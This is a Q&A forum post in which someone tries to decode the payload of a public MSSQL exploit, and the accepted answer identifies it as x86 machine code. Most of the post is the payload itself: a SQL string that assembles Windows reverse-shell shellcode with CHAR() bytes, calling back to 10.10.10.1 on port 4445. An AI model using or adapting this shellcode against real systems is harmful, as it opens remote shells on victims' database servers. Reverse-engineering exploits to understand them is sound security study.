# Decoding MSSQL Payload

Tags: sql-injection, buffer-overflow

I am trying to reverse engineer [this exploit on Exploit-DB](https://www.exploit-db.com/exploits/7501/)

The strings are going to be mostly copy and paste except for the payload on line 194.

Payload:

```
 /* reverse shell on 10.10.10.1:4445 */    
 "SET @buf=@buf+CHAR(0xfc)+CHAR(0x6a)+CHAR(0xeb)+CHAR(0x4d)+CHAR(0xe8)+CHAR(0xf9)+CHAR(0xff)+CHAR(0xff)+CHAR(0xff)+CHAR(0x60)+CHAR(0x8b)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x24)+CHAR(0x8b)+CHAR(0x45)+CHAR(0x3c)+CHAR(0x8b)+CHAR(0x7c)+CHAR(0x05)+CHAR(0x78)+CHAR(0x01)+CHAR(0xef)+CHAR(0x8b)+CHAR(0x4f)+CHAR(0x18)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x20)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x49)+CHAR(0x8b)+CHAR(0x34)+CHAR(0x8b)+CHAR(0x01)+CHAR(0xee)+CHAR(0x31)+CHAR(0xc0)+CHAR(0x99)+CHAR(0xac)+CHAR(0x84)+CHAR(0xc0)+CHAR(0x74)+CHAR(0x07)+CHAR(0xc1)+CHAR(0xca)+CHAR(0x0d)+CHAR(0x01)+CHAR(0xc2)+CHAR(0xeb)+CHAR(0xf4)+CHAR(0x3b)+CHAR(0x54)+CHAR(0x24)+CHAR(0x28)+CHAR(0x75)+CHAR(0xe5)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x24)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x66)+CHAR(0x8b)+CHAR(0x0c)+CHAR(0x4b)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x1c)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x03)+CHAR(0x2c)+CHAR(0x8b)+CHAR(0x89)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x1c)+CHAR(0x61)+CHAR(0xc3)+CHAR(0x31)+CHAR(0xdb)+CHAR(0x64)+CHAR(0x8b)+CHAR(0x43)+CHAR(0x30)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x0c)+CHAR(0x8b)+CHAR(0x70)+CHAR(0x1c)+CHAR(0xad)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x08)+CHAR(0x5e)+CHAR(0x68)+CHAR(0x8e)+CHAR(0x4e)+CHAR(0x0e)+CHAR(0xec)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x66)+CHAR(0x53)+CHAR(0x66)+CHAR(0x68)+CHAR(0x33)+CHAR(0x32)+CHAR(0x68)+CHAR(0x77)+CHAR(0x73)+CHAR(0x32)+CHAR(0x5f)+CHAR(0x54)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xcb)+CHAR(0xed)+CHAR(0xfc)+CHAR(0x3b)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5f)+CHAR(0x89)+CHAR(0xe5)+CHAR(0x66)+CHAR(0x81)+CHAR(0xed)+CHAR(0x08)+CHAR(0x02)+CHAR(0x55)+CHAR(0x6a)+CHAR(0x02)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xd9)+CHAR(0x09)+CHAR(0xf5)+CHAR(0xad)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x01)+CHAR(0x66)+CHAR(0x68)+CHAR(0x11)+CHAR(0x5d)+CHAR(0x66)+CHAR(0x53)+CHAR(0x89)+CHAR(0xe1)+CHAR(0x95)+CHAR(0x68)+CHAR(0xec)+CHAR(0xf9)+CHAR(0xaa)+CHAR(0x60)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0x10)+CHAR(0x51)+CHAR(0x55)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x66)+CHAR(0x6a)+CHAR(0x64)+CHAR(0x66)+CHAR(0x68)+CHAR(0x63)+CHAR(0x6d)+CHAR(0x6a)+CHAR(0x50)+CHAR(0x59)+CHAR(0x29)+CHAR(0xcc)+CHAR(0x89)+CHAR(0xe7)+CHAR(0x6a)+CHAR(0x44)+CHAR(0x89)+CHAR(0xe2)+CHAR(0x31)+CHAR(0xc0)+CHAR(0xf3)+CHAR(0xaa)+CHAR(0x95)+CHAR(0x89)+CHAR(0xfd)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2d)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2c)+CHAR(0x8d)+CHAR(0x7a)+CHAR(0x38)+CHAR(0xab)+CHAR(0xab)+CHAR(0xab)+CHAR(0x68)+CHAR(0x72)+CHAR(0xfe)+CHAR(0xb3)+CHAR(0x16)+CHAR(0xff)+CHAR(0x75)+CHAR(0x28)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5b)+CHAR(0x57)+CHAR(0x52)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x6a)+CHAR(0x01)+CHAR(0x51)+CHAR(0x51)+CHAR(0x55)+CHAR(0x51)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xad)+CHAR(0xd9)+CHAR(0x05)+CHAR(0xce)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0xff)+CHAR(0xff)+CHAR(0x37)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xe7)+CHAR(0x79)+CHAR(0xc6)+CHAR(0x79)+CHAR(0xff)+CHAR(0x75)+CHAR(0x04)+CHAR(0xff)+CHAR(0xd6)+CHAR(0xff)+CHAR(0x77)+CHAR(0xfc)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xef)+CHAR(0xce)+CHAR(0xe0)+CHAR(0x60)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)      "&_
```

The problem Im having is that no matter how I decode the chars I can't seem to get sensible data back. I've tried Hex, UTF8 and Ascii. Once I can figure out how to decode this I am pretty sure I can replicate it in python.

Answer (score 2, accepted):

This is because what you're trying to decode is an x86 machine code.

Here is what it looks like when disassembled: https://www.onlinedisassembler.com/odaweb/d16i42cD/0